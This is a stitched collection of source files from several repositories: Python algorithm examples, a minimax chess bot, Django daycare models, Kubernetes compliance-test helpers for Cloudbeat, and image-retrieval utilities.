minimax(depth + 1, node_index * 2 + 1, True, scores, height),
)
def main():
scores = [90, 23, 6, 33, 21, 65, 123, 34423]
height = math.log(len(scores), 2)
print("Optimal value : ", end="")
print(minimax(0, 0, True, scores, height))
if __name__ == "__main__":
import doctest
doctest.testmod()
main()
```
#### File: Python/bit_manipulation/binary_or_operator.py
```python
def binary_or(a: int, b: int):
"""
Take in 2 integers, convert them to binary, and return a binary number that is the
result of a binary or operation on the integers provided.
>>> binary_or(25, 32)
'0b111001'
>>> binary_or(37, 50)
'0b110111'
>>> binary_or(21, 30)
'0b11111'
>>> binary_or(58, 73)
'0b1111011'
>>> binary_or(0, 255)
'0b11111111'
>>> binary_or(0, 256)
'0b100000000'
>>> binary_or(0, -1)
Traceback (most recent call last):
...
ValueError: the value of both input must be positive
>>> binary_or(0, 1.1)
Traceback (most recent call last):
...
TypeError: 'float' object cannot be interpreted as an integer
>>> binary_or("0", "1")
Traceback (most recent call last):
...
TypeError: '<' not supported between instances of 'str' and 'int'
"""
if a < 0 or b < 0:
raise ValueError("the value of both input must be positive")
a_binary = str(bin(a))[2:] # remove the leading "0b"
b_binary = str(bin(b))[2:]
max_len = max(len(a_binary), len(b_binary))
return "0b" + "".join(
str(int("1" in (char_a, char_b)))
for char_a, char_b in zip(a_binary.zfill(max_len), b_binary.zfill(max_len))
)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: Python/conversions/hexadecimal_to_decimal.py
```python
hex_table = {hex(i)[2:]: i for i in range(16)} # Use [:2] to strip off the leading '0x'
def hex_to_decimal(hex_string: str) -> int:
"""
Convert a hexadecimal value to its decimal equivalent
#https://www.programiz.com/python-programming/methods/built-in/hex
>>> hex_to_decimal("a")
10
>>> hex_to_decimal("12f")
303
>>> hex_to_decimal(" 12f ")
303
>>> hex_to_decimal("FfFf")
65535
>>> hex_to_decimal("-Ff")
-255
>>> hex_to_decimal("F-f")
Traceback (most recent call last):
...
ValueError: Non-hexadecimal value was passed to the function
>>> hex_to_decimal("")
Traceback (most recent call last):
...
ValueError: Empty string was passed to the function
>>> hex_to_decimal("12m")
Traceback (most recent call last):
...
ValueError: Non-hexadecimal value was passed to the function
"""
hex_string = hex_string.strip().lower()
if not hex_string:
raise ValueError("Empty string was passed to the function")
is_negative = hex_string[0] == "-"
if is_negative:
hex_string = hex_string[1:]
if not all(char in hex_table for char in hex_string):
raise ValueError("Non-hexadecimal value was passed to the function")
decimal_number = 0
for char in hex_string:
decimal_number = 16 * decimal_number + hex_table[char]
return -decimal_number if is_negative else decimal_number
if __name__ == "__main__":
from doctest import testmod
testmod()
```
#### File: data_structures/linked_list/has_loop.py
```python
from typing import Any
class ContainsLoopError(Exception):
pass
class Node:
def __init__(self, data: Any) -> None:
self.data = data
self.next_node = None
def __iter__(self):
node = self
visited = []
while node:
if node in visited:
raise ContainsLoopError
visited.append(node)
yield node.data
node = node.next_node
@property
def has_loop(self) -> bool:
"""
A loop is when the exact same Node appears more than once in a linked list.
>>> root_node = Node(1)
>>> root_node.next_node = Node(2)
>>> root_node.next_node.next_node = Node(3)
>>> root_node.next_node.next_node.next_node = Node(4)
>>> root_node.has_loop
False
>>> root_node.next_node.next_node.next_node = root_node.next_node
>>> root_node.has_loop
True
"""
try:
list(self)
return False
except ContainsLoopError:
return True
if __name__ == "__main__":
root_node = Node(1)
root_node.next_node = Node(2)
root_node.next_node.next_node = Node(3)
root_node.next_node.next_node.next_node = Node(4)
print(root_node.has_loop) # False
root_node.next_node.next_node.next_node = root_node.next_node
print(root_node.has_loop) # True
root_node = Node(5)
root_node.next_node = Node(6)
root_node.next_node.next_node = Node(5)
root_node.next_node.next_node.next_node = Node(6)
print(root_node.has_loop) # False
root_node = Node(1)
print(root_node.has_loop) # False
```
#### File: linear_algebra/src/transformations_2d.py
```python
from __future__ import annotations
from math import cos, sin
def scaling(scaling_factor: float) -> list[list[float]]:
"""
>>> scaling(5)
[[5.0, 0.0], [0.0, 5.0]]
"""
scaling_factor = float(scaling_factor)
return [[scaling_factor * int(x == y) for x in range(2)] for y in range(2)]
def rotation(angle: float) -> list[list[float]]:
"""
>>> rotation(45) # doctest: +NORMALIZE_WHITESPACE
[[0.5253219888177297, -0.8509035245341184],
[0.8509035245341184, 0.5253219888177297]]
"""
c, s = cos(angle), sin(angle)
return [[c, -s], [s, c]]
def projection(angle: float) -> list[list[float]]:
"""
>>> projection(45) # doctest: +NORMALIZE_WHITESPACE
[[0.27596319193541496, 0.446998331800279],
[0.446998331800279, 0.7240368080645851]]
"""
c, s = cos(angle), sin(angle)
cs = c * s
return [[c * c, cs], [cs, s * s]]
def reflection(angle: float) -> list[list[float]]:
"""
>>> reflection(45) # doctest: +NORMALIZE_WHITESPACE
[[0.05064397763545947, 0.893996663600558],
[0.893996663600558, 0.7018070490682369]]
"""
c, s = cos(angle), sin(angle)
cs = c * s
return [[2 * c - 1, 2 * cs], [2 * cs, 2 * s - 1]]
print(f" {scaling(5) = }")
print(f" {rotation(45) = }")
print(f"{projection(45) = }")
print(f"{reflection(45) = }")
```
#### File: Python/other/markov_chain.py
```python
from __future__ import annotations
from collections import Counter
from random import random
class MarkovChainGraphUndirectedUnweighted:
"""
Undirected Unweighted Graph for running Markov Chain Algorithm
"""
def __init__(self):
self.connections = {}
def add_node(self, node: str) -> None:
self.connections[node] = {}
def add_transition_probability(
self, node1: str, node2: str, probability: float
) -> None:
if node1 not in self.connections:
self.add_node(node1)
if node2 not in self.connections:
self.add_node(node2)
self.connections[node1][node2] = probability
def get_nodes(self) -> list[str]:
return list(self.connections)
def transition(self, node: str) -> str:
current_probability = 0
random_value = random()
for dest in self.connections[node]:
current_probability += self.connections[node][dest]
if current_probability > random_value:
return dest
def get_transitions(
start: str, transitions: list[tuple[str, str, float]], steps: int
) -> dict[str, int]:
"""
Running Markov Chain algorithm and calculating the number of times each node is
visited
>>> transitions = [
... ('a', 'a', 0.9),
... ('a', 'b', 0.075),
... ('a', 'c', 0.025),
... ('b', 'a', 0.15),
... ('b', 'b', 0.8),
... ('b', 'c', 0.05),
... ('c', 'a', 0.25),
... ('c', 'b', 0.25),
... ('c', 'c', 0.5)
... ]
>>> result = get_transitions('a', transitions, 5000)
>>> result['a'] > result['b'] > result['c']
True
"""
graph = MarkovChainGraphUndirectedUnweighted()
for node1, node2, probability in transitions:
graph.add_transition_probability(node1, node2, probability)
visited = Counter(graph.get_nodes())
node = start
for _ in range(steps):
node = graph.transition(node)
visited[node] += 1
return visited
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: project_euler/problem_008/sol3.py
```python
import sys
N = """73167176531330624919225119674426574742355349194934\
96983520312774506326239578318016984801869478851843\
85861560789112949495459501737958331952853208805511\
12540698747158523863050715693290963295227443043557\
66896648950445244523161731856403098711121722383113\
62229893423380308135336276614282806444486645238749\
30358907296290491560440772390713810515859307960866\
70172427121883998797908792274921901699720888093776\
65727333001053367881220235421809751254540594752243\
52584907711670556013604839586446706324415722155397\
53697817977846174064955149290862569321978468622482\
83972241375657056057490261407972968652414535100474\
82166370484403199890008895243450658541227588666881\
16427171479924442928230863465674813919123162824586\
17866458359124566529476545682848912883142607690042\
24219022671055626321111109370544217506941658960408\
07198403850962455444362981230987879927244284909188\
84580156166097919133875499200524063689912560717606\
05886116467109405077541002256983155200055935729725\
71636269561882670428252483600823257530420752963450"""
def str_eval(s: str) -> int:
"""Returns product of digits in given string n
>>> str_eval("987654321")
362880
>>> str_eval("22222222")
256
"""
product = 1
for digit in s:
product *= int(digit)
return product
def solution(n: str = N) -> int:
"""Find the thirteen adjacent digits in the 1000-digit number n that have
the greatest product and returns it.
>>> solution(N)
23514624000
"""
largest_product = -sys.maxsize - 1
substr = n[:13]
cur_index = 13
while cur_index < len(n) - 13:
if int(n[cur_index]) >= int(substr[0]):
substr = substr[1:] + n[cur_index]
cur_index += 1
else:
largest_product = max(largest_product, str_eval(substr))
substr = n[cur_index : cur_index + 13]
cur_index += 13
return largest_product
if __name__ == "__main__":
print(solution(N))
```
#### File: project_euler/problem_020/sol2.py
```python
from math import factorial
def solution(num: int = 100) -> int:
"""Returns the sum of the digits in the factorial of num
>>> solution(100)
648
>>> solution(50)
216
>>> solution(10)
27
>>> solution(5)
3
>>> solution(3)
6
>>> solution(2)
2
>>> solution(1)
1
"""
return sum([int(x) for x in str(factorial(num))])
if __name__ == "__main__":
print(solution(int(input("Enter the Number: ").strip())))
```
#### File: project_euler/problem_025/sol2.py
```python
def fibonacci_generator() -> int:
"""
A generator that produces numbers in the Fibonacci sequence
>>> generator = fibonacci_generator()
>>> next(generator)
1
>>> next(generator)
2
>>> next(generator)
3
>>> next(generator)
5
>>> next(generator)
8
"""
a, b = 0, 1
while True:
a, b = b, a + b
yield b
def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
>>> solution(1000)
4782
>>> solution(100)
476
>>> solution(50)
237
>>> solution(3)
12
"""
answer = 1
gen = fibonacci_generator()
while len(str(next(gen))) < n:
answer += 1
return answer + 1
if __name__ == "__main__":
print(solution(int(str(input()).strip())))
```
#### File: project_euler/problem_057/sol1.py
```python
def solution(n: int = 1000) -> int:
"""
returns number of fractions containing a numerator with more digits than
the denominator in the first n expansions.
>>> solution(14)
2
>>> solution(100)
15
>>> solution(10000)
1508
"""
prev_numerator, prev_denominator = 1, 1
result = []
for i in range(1, n + 1):
numerator = prev_numerator + 2 * prev_denominator
denominator = prev_numerator + prev_denominator
if len(str(numerator)) > len(str(denominator)):
result.append(i)
prev_numerator = numerator
prev_denominator = denominator
return len(result)
if __name__ == "__main__":
print(f"{solution() = }")
```
#### File: project_euler/problem_120/sol1.py
```python
def solution(n: int = 1000) -> int:
"""
Returns ∑ r_max for 3 <= a <= n as explained above
>>> solution(10)
300
>>> solution(100)
330750
>>> solution(1000)
333082500
"""
return sum(2 * a * ((a - 1) // 2) for a in range(3, n + 1))
if __name__ == "__main__":
print(solution())
```
#### File: Python/quantum/not_gate.py
```python
import qiskit as q
def single_qubit_measure(qubits: int, classical_bits: int) -> q.result.counts.Counts:
"""
>>> single_qubit_measure(2, 2)
{'11': 1000}
>>> single_qubit_measure(4, 4)
{'0011': 1000}
"""
# Use Aer's qasm_simulator
simulator = q.Aer.get_backend("qasm_simulator")
# Create a Quantum Circuit acting on the q register
circuit = q.QuantumCircuit(qubits, classical_bits)
# Apply X (NOT) Gate to Qubits 0 & 1
circuit.x(0)
circuit.x(1)
# Map the quantum measurement to the classical bits
circuit.measure([0, 1], [0, 1])
# Execute the circuit on the qasm simulator
job = q.execute(circuit, simulator, shots=1000)
# Return the histogram data of the results of the experiment.
return job.result().get_counts(circuit)
if __name__ == "__main__":
counts = single_qubit_measure(2, 2)
print(f"Total count for various states are: {counts}")
```
#### File: Python/quantum/quantum_entanglement.py
```python
import qiskit
def quantum_entanglement(qubits: int = 2) -> qiskit.result.counts.Counts:
"""
# >>> quantum_entanglement(2)
# {'00': 500, '11': 500}
# ┌───┐ ┌─┐
# q_0: ┤ H ├──■──┤M├───
# └───┘┌─┴─┐└╥┘┌─┐
# q_1: ─────┤ X ├─╫─┤M├
# └───┘ ║ └╥┘
# c: 2/═══════════╩══╩═
# 0 1
Args:
qubits (int): number of quibits to use. Defaults to 2
Returns:
qiskit.result.counts.Counts: mapping of states to its counts
"""
classical_bits = qubits
# Using Aer's qasm_simulator
simulator = qiskit.Aer.get_backend("qasm_simulator")
# Creating a Quantum Circuit acting on the q register
circuit = qiskit.QuantumCircuit(qubits, classical_bits)
# Adding a H gate on qubit 0 (now q0 in superposition)
circuit.h(0)
for i in range(1, qubits):
# Adding CX (CNOT) gate
circuit.cx(i - 1, i)
# Mapping the quantum measurement to the classical bits
circuit.measure(list(range(qubits)), list(range(classical_bits)))
# Now measuring any one qubit would affect other qubits to collapse
# their super position and have same state as the measured one.
# Executing the circuit on the qasm simulator
job = qiskit.execute(circuit, simulator, shots=1000)
return job.result().get_counts(circuit)
if __name__ == "__main__":
print(f"Total count for various states are: {quantum_entanglement(3)}")
```
#### File: Python/sorts/recursive_bubble_sort.py
```python
def bubble_sort(list_data: list, length: int = 0) -> list:
"""
It is similar is bubble sort but recursive.
:param list_data: mutable ordered sequence of elements
:param length: length of list data
:return: the same list in ascending order
>>> bubble_sort([0, 5, 2, 3, 2], 5)
[0, 2, 2, 3, 5]
>>> bubble_sort([], 0)
[]
>>> bubble_sort([-2, -45, -5], 3)
[-45, -5, -2]
>>> bubble_sort([-23, 0, 6, -4, 34], 5)
[-23, -4, 0, 6, 34]
>>> bubble_sort([-23, 0, 6, -4, 34], 5) == sorted([-23, 0, 6, -4, 34])
True
>>> bubble_sort(['z','a','y','b','x','c'], 6)
['a', 'b', 'c', 'x', 'y', 'z']
>>> bubble_sort([1.1, 3.3, 5.5, 7.7, 2.2, 4.4, 6.6])
[1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7]
"""
length = length or len(list_data)
swapped = False
for i in range(length - 1):
if list_data[i] > list_data[i + 1]:
list_data[i], list_data[i + 1] = list_data[i + 1], list_data[i]
swapped = True
return list_data if not swapped else bubble_sort(list_data, length - 1)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: Python/strings/swap_case.py
```python
import re
# This re.compile() function saves the pattern from 'a' to 'z' and 'A' to 'Z'
# into 'regexp' variable
regexp = re.compile("[^a-zA-Z]+")
def swap_case(sentence):
"""
This function will convert all lowercase letters to uppercase letters
and vice versa.
>>> swap_case('Algorithm.Python@89')
'aLGORITHM.pYTHON@89'
"""
new_string = ""
for char in sentence:
if char.isupper():
new_string += char.lower()
if char.islower():
new_string += char.upper()
if regexp.search(char):
new_string += char
return new_string
if __name__ == "__main__":
print(swap_case(input("Please input sentence:")))
```
|
{
"source": "JeniaD/Chess-Bot",
"score": 3
}
|
#### File: JeniaD/Chess-Bot/bot.py
```python
from textwrap import wrap
import random
import chess
import copy
def CheckForResult(originalBoard, deep, root = False, side = "White", makeCopy = True):
if makeCopy: board = copy.deepcopy(originalBoard)
else: board = originalBoard
if deep <= 0:
#Check statistics
total = 0
if board.outcome() != None:
res = board.outcome().result()
if res == "1-0": return 700
elif res == "0-1": return -700
pieceMap = board.piece_map()
for piece in pieceMap:
if pieceMap[piece] == chess.Piece.from_symbol('P'): total += 1
elif pieceMap[piece] == chess.Piece.from_symbol('p'): total -= 1
elif pieceMap[piece] == chess.Piece.from_symbol('N'): total += 3
elif pieceMap[piece] == chess.Piece.from_symbol('B'): total += 3
elif pieceMap[piece] == chess.Piece.from_symbol('n'): total -= 3
elif pieceMap[piece] == chess.Piece.from_symbol('b'): total -= 3
elif pieceMap[piece] == chess.Piece.from_symbol('R'): total += 5
elif pieceMap[piece] == chess.Piece.from_symbol('r'): total -= 5
elif pieceMap[piece] == chess.Piece.from_symbol('Q'): total += 9
elif pieceMap[piece] == chess.Piece.from_symbol('q'): total -= 9
return total
possibleSituations = {}
for possibleMove in board.legal_moves:
newBoard = copy.deepcopy(board)
newBoard.push((possibleMove))
possibleSituations[possibleMove] = CheckForResult(newBoard, deep-1, side=side, makeCopy=False)
bestMove = None
bestResult = -1000 if side == "White" else 1000
#Needs to filter the best move from possibillities
if root:
# Needs to give best move.
for possibleMove in possibleSituations:
if side == "White" and possibleSituations[possibleMove] > bestResult:
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
elif side == "Black" and possibleSituations[possibleMove] < bestResult:
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
elif possibleSituations[possibleMove] == bestResult:
if random.getrandbits(1):
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
... # Same outcome
return bestMove, bestResult
else:
worstResult = -1000 if side == "Black" else 1000
# Find the worst situation of enemies answers
for possibleMove in possibleSituations:
if side == "Black" and possibleSituations[possibleMove] > worstResult:
worstResult = possibleSituations[possibleMove]
elif side == "White" and possibleSituations[possibleMove] < worstResult:
worstResult = possibleSituations[possibleMove]
else:
... # Same outcome
return worstResult
import chess.pgn
board = chess.Board()
if input("Type of game (b - bots, r - real): ").upper() == 'B':
game = chess.pgn.Game()
game.headers["Event"] = "Bot test"
game.headers["White"] = "White bot power 3"
game.headers["Black"] = "Black bot power 3"
game.setup(board)
node = game
print("Starting...")
def Split(s):
res = ""
leftUntilSpace = 2
for character in s:
if not leftUntilSpace: res += " "
res += character
leftUntilSpace -= 1
return res
while board.outcome() == None:
try:
move = CheckForResult(board, 4, True, "White")
print(str(move[0]) + ",", \
"good material" if not move[1] \
else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
else ("Black is winning by " + str(abs(move[1]))))
print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
node = node.add_variation(move[0])
move = CheckForResult(board, 3, True, "Black")
print(str(move[0]) + ",", \
"good material" if not move[1] \
else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
else ("Black is winning by " + str(abs(move[1]))))
print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
# recording += board.fen()
node = node.add_variation(move[0])
print(board)
except Exception as e:
print(e)
break
else:
...
else:
while board.outcome() == None:
possibleMoves = len(list(board.legal_moves))
if possibleMoves >= 19: move = CheckForResult(board, 3, True, "White")
else: move = CheckForResult(board, 4, True, "White")
print(str(move[0]))# + ",", \
# "good material" if not move[1] \
# else ("White is winning by " + str(abs(move[1]))) if move[1] > 0 \
# else ("Black is winning by " + str(abs(move[1]))))
# print(" Possible moves found:", len(list(board.legal_moves)))
board.push_san(str(move[0]))
move = input("> ")
while len(move) != 4:
print("Error: illegal move")
move = input("> ")
board.push_san(move)
print(board.outcome())
print(board.result())
print("\n\n\n", game)
```
|
{
"source": "JeniaD/Python-useful-scripts",
"score": 3
}
|
#### File: JeniaD/Python-useful-scripts/Binary trees.py
```python
class Node:
def __init__(self, data, branchings = []):
self.branchings = branchings
self.data = data
def AddBranch(self, object):
self.branchings += [Node(object)]
def AddBud(self, object):
self.branchings += object
```
|
{
"source": "jeniaSakirko/Hotails",
"score": 2
}
|
#### File: Hotails/daycare/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from .validators import validate_username_already_exist
from .validators import validate_max_length
from .validators import validate_price
from .validators import validate_url_is_image
from .validators import validate_if_daycare_exists
from django.core.validators import validate_email
from django.core.validators import MaxLengthValidator
from django.core.exceptions import ObjectDoesNotExist
class DayCare(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, default=None, blank=True, null=False, editable=True)
name = models.CharField(max_length=20, blank=True, unique=True, validators=[MaxLengthValidator])
description = models.TextField(blank=True, null=True)
price_per_day = models.IntegerField(blank=False, null=False, default=0)
capacity = models.IntegerField(null=False, blank=True)
area = models.CharField(max_length=20, blank=True, validators=[MaxLengthValidator])
city = models.CharField(max_length=20, blank=True, validators=[MaxLengthValidator])
address = models.CharField(max_length=50, blank=True, validators=[MaxLengthValidator])
def __str__(self):
return f'Daycare name: {self.name}'
@staticmethod
def get_daycare_by_id(daycare_id):
try:
return DayCare.objects.filter(daycare_id=daycare_id)
except ObjectDoesNotExist:
return None
@staticmethod
def create(email, username, password, name, description, price_per_day, capacity, area, city, address):
validate_email(email)
validate_username_already_exist(username)
validate_max_length(name, 20, "name")
validate_max_length(area, 20, "area")
validate_max_length(city, 20, "city")
validate_max_length(address, 50, "address")
validate_price(price_per_day)
new_daycare = DayCare(user=User.objects.create_user(email=email, username=username, password=password),
name=name, description=description, price_per_day=price_per_day,
capacity=capacity, area=area, city=city, address=address)
new_daycare.user.save()
new_daycare.save()
return new_daycare
def get_daycare_primary_image_url(self):
daycare_images = Image.get_images_by_daycare_id(daycare_id=self.id)
if daycare_images is not None and daycare_images.first() is not None:
return daycare_images.first().url
return "../../static/images/daycare-default-profile-image.jpeg"
class Image(models.Model):
url = models.CharField(max_length=1000)
daycare_id = models.ForeignKey(DayCare, on_delete=models.CASCADE,
default=None, blank=True, null=False, editable=True)
@classmethod
def create(cls, url, daycare_id):
validate_url_is_image(url)
validate_if_daycare_exists(daycare_id.id)
new_image = Image(url=url, daycare_id=daycare_id)
new_image.save()
return new_image
@staticmethod
def get_images_by_daycare_id(daycare_id):
try:
return Image.objects.filter(daycare_id=daycare_id)
except ObjectDoesNotExist:
return None
```
|
{
"source": "jeniawhite/cloudbeat",
"score": 3
}
|
#### File: tests/commonlib/elastic_wrapper.py
```python
from elasticsearch import Elasticsearch
class ElasticWrapper:
"""
Wrapper that uses elasticsearch official package
"""
def __init__(self, elastic_params):
self.index = elastic_params.cis_index
self.es = Elasticsearch(hosts=elastic_params.url,
basic_auth=elastic_params.basic_auth)
def get_index_data(self, index_name: str, query: dict = None):
result = self.es.search(index=index_name, body=query)
return result
```
#### File: tests/commonlib/io_utils.py
```python
import os
import io
import json
import yaml
import shutil
from pathlib import Path
from munch import Munch, munchify
def get_logs_from_stream(stream: str) -> list[Munch]:
"""
This function converts logs stream to list of Munch objects (dictionaries)
@param stream: StringIO stream
@return: List of Munch objects
"""
logs = io.StringIO(stream)
result = []
for log in logs:
if log and "bundles" in log:
try:
result.append(munchify(json.loads(log)))
except json.decoder.JSONDecodeError:
result.append(munchify(json.loads(log.replace("'", '"'))))
except Exception as e:
print(e)
continue
return result
def get_k8s_yaml_objects(file_path: Path) -> list[str: dict]:
"""
This function loads yaml file, and returns the following list:
[ {<k8s_kind> : {<k8s_metadata}}]
:param file_path: YAML path
:return: [ {<k8s_kind> : {<k8s_metadata}}]
"""
if not file_path:
raise Exception(f'{file_path} is required')
result_list = []
with file_path.open() as yaml_file:
yaml_objects = yaml.safe_load_all(yaml_file)
for yml_doc in yaml_objects:
if yml_doc:
doc = Munch(yml_doc)
result_list.append({
doc.get('kind'): {key: value for key, value in doc.get('metadata').items()
if key in ['name', 'namespace']}
})
return result_list
class FsClient:
@staticmethod
def exec_command(container_name: str, command: str, param_value: str, resource: str):
"""
This function executes os command
@param container_name: Container node
@param command: Linux command to be executed
@param param_value: Value to be used in exec command
@param resource: File / Resource path
@return: None
"""
if command == 'touch':
if os.path.exists(param_value):
return
else:
open(param_value, "a+")
return
# if command == 'getent' and param_value == 'group':
# try:
# grp.getgrnam(param_value)
# return ['etcd']
# except KeyError:
# return []
#
# if command == 'getent' and param_value == 'passwd':
# try:
# pwd.getpwnam(param_value)
# return ['etcd']
# except KeyError:
# return []
#
# if command == 'groupadd' and param_value == 'etcd':
# try:
# grp.getgrnam(param_value)
# return ['etcd']
# except KeyError:
# return []
if container_name == '':
raise Exception("Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
if command == 'chmod':
os.chmod(path=resource, mode=int(param_value))
elif command == 'chown':
uid_gid = param_value.split(':')
if len(uid_gid) != 2:
raise Exception(
"User and group parameter shall be separated by ':' ")
shutil.chown(path=resource, user=uid_gid[0], group=uid_gid[1])
else:
raise Exception(
f"Command '{command}' still not implemented in test framework")
@staticmethod
def edit_process_file(container_name: str, dictionary, resource: str):
"""
This function edits a process file
@param container_name: Container node
@param dictionary: Process parameters to set/unset
@param resource: File / Resource path
@return: None
"""
if container_name == '':
raise Exception(f"Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
# Open and load the YAML into variable
with current_resource.open() as f:
r_file = yaml.safe_load(f)
# Get process configuration arguments
command = r_file["spec"]["containers"][0]["command"]
# Collect set/unset keys and values from the dictionary
set_dict = dictionary.get("set", {})
unset_list = dictionary.get("unset", [])
# Cycle across set items from the dictionary
for skey, svalue in set_dict.items():
# Find if set key exists already in the configuration arguments
if any(skey == x.split("=")[0] for x in command):
# Replace the value of the key with the new value from the set items
command = list(map(lambda x: x.replace(
x, skey + "=" + svalue) if skey == x.split("=")[0] else x, command))
else:
# In case of non existing key in the configuration arguments, append the key/value from set items
command.append(skey + "=" + svalue)
# Cycle across unset items from the dictionary
for uskey in unset_list:
# Filter out the unset keys from the configuration arguments
command = [x for x in command if uskey != x.split("=")[0]]
# Override the the configuration arguments with the newly built configuration arguments
r_file["spec"]["containers"][0]["command"] = command
# Write the newly build configuration arguments
with current_resource.open(mode="w") as f:
yaml.dump(r_file, f)
@staticmethod
def edit_config_file(container_name: str, dictionary, resource: str):
"""
This function edits a config file
@param container_name: Container node
@param dictionary: Config parameters to set/unset
@param resource: Config path
@return: None
"""
if container_name == '':
raise Exception("Unknown container name is sent")
current_resource = Path(resource)
if not current_resource.is_file():
raise Exception(
f"File {resource} does not exist or mount missing.")
# Open and load the YAML into variable
with current_resource.open() as f:
r_file = yaml.safe_load(f)
# Collect set/unset keys and values from the dictionary
set_dict = dictionary.get("set", {})
unset_list = dictionary.get("unset", [])
# Merge two dictionaries with priority for the set items
r_file = { **r_file, **set_dict }
# Cycle across unset items from the dictionary
for uskey in unset_list:
# Parsed dot separated key values
keys = uskey.split('.')
key_to_del = keys.pop()
p = r_file
# Advance inside the dictionary for nested keys
for key in keys:
p = p.get(key, None)
if p is None:
# Non existing nested key
break
# Remove nested keys when all path exists
if p:
del p[key_to_del]
# Write the newly build config
with current_resource.open(mode="w") as f:
yaml.dump(r_file, f)
```
#### File: cloudbeat/tests/conftest.py
```python
import pytest
import configuration
from commonlib.kubernetes import KubernetesHelper
from commonlib.elastic_wrapper import ElasticWrapper
from commonlib.docker_wrapper import DockerWrapper
from commonlib.io_utils import FsClient
@pytest.fixture(scope="session", autouse=True)
def k8s():
"""
This function (fixture) instantiates KubernetesHelper depends on configuration.
When executing tests code local, kubeconfig file is used for connecting to K8s cluster.
When code executed as container (pod / job) in K8s cluster in cluster configuration is used.
@return: Kubernetes Helper instance.
"""
return KubernetesHelper(is_in_cluster_config=configuration.kubernetes.is_in_cluster_config)
@pytest.fixture(scope="session", autouse=True)
def cloudbeat_agent():
"""
This function (fixture) retrieves agent configuration, defined in configuration.py file.
@return: Agent config
"""
return configuration.agent
@pytest.fixture(scope="session", autouse=True)
def elastic_client():
"""
This function (fixture) instantiate ElasticWrapper.
@return: ElasticWrapper client
"""
elastic_config = configuration.elasticsearch
es_client = ElasticWrapper(elastic_params=elastic_config)
return es_client
@pytest.fixture(scope="session", autouse=True)
def api_client():
"""
This function (fixture) instantiates client depends on configuration.
For local development mode, the docker api may be used.
For production mode (deployment to k8s cluster), FsClient shall be used.
@return: Client (docker / FsClient).
"""
docker_config = configuration.docker
print(f"Config use_docker value: {docker_config.use_docker}")
if docker_config.use_docker:
client = DockerWrapper(config=docker_config)
else:
client = FsClient
return client
```
#### File: product/tests/test_kube_api_rules.py
```python
from datetime import datetime
import pytest
from commonlib.utils import get_evaluation, get_resource_identifier
from product.tests.kube_rules import cis_5_1_5
@pytest.mark.rules
@pytest.mark.parametrize(
("rule_tag", "resource_type", "resource_body", "expected"),
[
*cis_5_1_5.values(),
],
ids=[
*cis_5_1_5.keys(),
]
)
def test_kube_resource_patch(setup_busybox_pod, rule_tag, resource_type, resource_body, expected):
"""
Test kube resource
@param setup_busybox_pod: pre step that set-ups a busybox pod to test on
@param rule_tag: rule tag in the CIS benchmark
@param resource_type: kube resource type, e.g., Pod, ServiceAccount, etc.
@param resource_body: a dict to represent the relevant properties of the resource
@param expected: "failed" or "passed"
"""
k8s_client, _, agent_config = setup_busybox_pod
# make sure resource exists
resource_name = resource_body["metadata"]["name"]
resource = k8s_client.get_resource(
resource_type=resource_type,
name=resource_name,
namespace=agent_config.namespace
)
assert resource, f"Resource {resource_type} not found"
# patch resource
k8s_client.patch_resources(
name=resource_name,
resource_type=resource_type,
namespace=agent_config.namespace,
body=resource_body,
)
# check resource evaluation
pods = k8s_client.get_agent_pod_instances(agent_name=agent_config.name, namespace=agent_config.namespace)
evaluation = get_evaluation(
k8s=k8s_client,
timeout=agent_config.findings_timeout,
pod_name=pods[0].metadata.name,
namespace=agent_config.namespace,
rule_tag=rule_tag,
exec_timestamp=datetime.utcnow(),
resource_identifier=get_resource_identifier(resource_body)
)
assert evaluation == expected, f"Rule {rule_tag} verification failed. expected: {expected} actual: {evaluation}"
```
|
{
"source": "jenicek/asmk",
"score": 3
}
|
#### File: asmk/asmk/functional.py
```python
import numpy as np
def normalize_vec_l2(vecs):
"""Perform l2 normalization on each vector in a given matrix (axis 1)"""
norm = np.linalg.norm(vecs, ord=2, axis=1, keepdims=True) + 1e-6
return vecs / norm
def asmk_kernel(sim, image_ids, *, alpha, similarity_threshold):
"""Compute scores for visual words"""
mask = (sim>=similarity_threshold)
sim = np.power(sim[mask], alpha) # monomial kernel
return image_ids[mask], sim
```
#### File: asmk/asmk/io_helpers.py
```python
import os.path
import time
import sys
import logging
import pickle
import urllib.request
from io import StringIO
from pathlib import Path
import yaml
import numpy as np
# Params
def load_params(path):
"""Return loaded parameters from a yaml file"""
with open(path, "r") as handle:
content = yaml.safe_load(handle)
if "__template__" in content:
# Treat template as defaults
template_path = os.path.expanduser(content.pop("__template__"))
template = load_params(os.path.join(os.path.dirname(path), template_path))
content = dict_deep_overlay(template, content)
return content
def dict_deep_overlay(defaults, params):
"""If defaults and params are both dictionaries, perform deep overlay (use params value for
keys defined in params, otherwise use defaults value)"""
if isinstance(defaults, dict) and isinstance(params, dict):
for key in params:
defaults[key] = dict_deep_overlay(defaults.get(key, None), params[key])
return defaults
return params
# Logging
def init_logger(log_path):
"""Return a logger instance which logs to stdout and, if log_path is not None, also to a file"""
logger = logging.getLogger("ASMK")
logger.setLevel(logging.DEBUG)
stdout_handler = logging.StreamHandler()
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(logging.Formatter('%(name)s %(levelname)s: %(message)s'))
logger.addHandler(stdout_handler)
if log_path:
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
